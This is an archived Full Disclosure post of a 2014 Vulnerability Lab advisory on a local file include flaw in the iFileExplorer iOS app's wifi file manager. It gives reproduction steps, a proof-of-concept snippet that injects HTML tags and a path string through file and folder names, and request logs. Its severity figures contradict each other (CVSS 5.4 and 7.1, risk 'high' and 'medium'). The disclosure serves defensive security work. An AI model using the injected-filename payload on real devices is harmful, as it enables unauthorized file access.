[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] iFileExplorer v6.51 iOS - File Include Web Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-10-27 15:06:18
Message-ID: 544E5F6A.6090205 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
iFileExplorer v6.51 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1345
Release Date:
=============
2014-10-22
Vulnerability Laboratory ID (VL-ID):
====================================
1345
Common Vulnerability Scoring System:
====================================
5.4
Product & Service Introduction:
===============================
Do you find it frustrating not being able to use your iPhone to freely transfer files? Would \
you like to be able to view your documents and pictures more easily? Are there some files \
you'd prefer to keep private? Do you want to upload videos or music to your iPhone via WIFI? \
iFileExplorer can help you solve these problems! It can transform your iPhone into a file \
manager, enabling you to view all your files on your iPhone!
(Copy of the Homepage: https://itunes.apple.com/us/app/ifileexplorer/id355253462 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a local file include web vulnerability \
via sync in the official iFileExplorer v6.51 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
ColorfulPhone
Product: iFileExplorer - iOS Mobile Web Application 6.51
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official iFileExplorer v6.51 \
iOS mobile web-application. The local file include web vulnerability allows remote attackers to \
unauthorized include local file/path requests or system specific path commands to compromise \
the mobile web-application.
The vulnerability is located in the foldername and filename values if the wifi interface \
module. Local attackers are able to manipulate the wifi web interface by usage of the \
vulnerable sync function. The sync does not encode or parse the context on add of a folders or \
files. Local attacker are able to manipulate the input of the files and folder to exploit the \
issue by the sync method of the web-application. The execution of únauthorized local file or \
path request occurs in the index file dir listing module of the ifileexplorer application. The \
request method to inject is sync and the attack vector is located on the application-side of \
the affected service.
The security risk of the local file include web vulnerability is estimated as high with a cvss \
(common vulnerability scoring system) count of 7.1. Exploitation of the file include web \
vulnerability requires no user interaction or privileged web-application user account. \
Successful exploitation of the local file include web vulnerability results in mobile \
application or connected device component compromise.
Vulnerable Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] Add Function & Rename
Vulnerable Parameter(s):
[+] foldername
[+] filename
Affected Module(s):
[+] iFileExplorer Wifi Interface - Path Dir Listing
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers with low \
privileged application user account without user interaction by a sync. For security \
demonstration or to reproduce the security vulnerability follow the provided information and \
steps below to continue.
1. Install the ios app and start the app after the install \
(https://itunes.apple.com/us/app/ifileexplorer/id355253462) 2. Open the wifi symbole in the \
first app sidebar category 3. Inject your own payload by usage of the `my files` section
Note: Include as Filename or Foldername your own payload to unauhtorized request the local file \
or device path 4. Sync after the add and open the wifi web interface of the application
5. The local index of the interface requests the path listing unauthorized the file- and \
foldername 6. Successful reproduce of the local security vulnerability!
PoC: iFileExplorer Index - File Manager
<tbody><tr><td class="rowTitle" align="left" bgcolor="#E3E9FF">Other</td></tr>
<tr><td align="left" bgcolor="#FFFFFF">
<table bgcolor="#FFFFFF" border="0" bordercolor="#FFFFFF" cellpadding="0" cellspacing="0">
<tbody><tr>
<td align="center" bgcolor="#FFFFFF" height="142" width="110">
<table bgcolor="#FFFFFF" border="0" bordercolor="#FFFFFF" cellpadding="0" \
cellspacing="0"><tbody><tr> <td align="center" bgcolor="#FFFFFF" height="110" valign="buttom" \
width="110"> <a href=".bkm337"><img src="x">%20<iframe src="a">%20<iframe>png">
<img src=".bkm337"><./[LOCAL FILE INECLUDE WEB VULNERABILITY!].png?act=getico" width="90" \
height="90" border="0"></a></td></tr> <tr><td width="110" height="16" align="center" \
valign="top" bgcolor="#FFFFFF">.bkm3...</td></tr> <tr><td width="110" height="16" valign="top" \
bgcolor="#FFFFFF"> <div align="center"><p class="font1">
<button onclick="onDelete('.bkm337"><./[LOCAL FILE INECLUDE WEB \
VULNERABILITY!].png?act=delete');" value="">Delete</button></p></div></td></tr> </table></td>
</tr>
</table>
--- PoC Session Logs (GET) [Execution] ---
Status: 200[OK]
GET http://localhost:8080/./[LOCAL FILE INECLUDE WEB VULNERABILITY!] Load Flags[VALIDATE_ALWAYS \
] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type] Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
- Response
Status: 200[OK]
GET http://localhost:8080/./[LOCAL FILE INECLUDE WEB VULNERABILITY!] Load \
Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime \
Type[application/x-unknown-content-type] Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the add file/folder and rename \
input fields. After the restriction the input and output needs to be encoded by a secure \
mechanism to prevent the execution itself.
Security Risk:
==============
The security risk of the local file include web vulnerability in the filename and foldername \
sync function is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) \
(research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic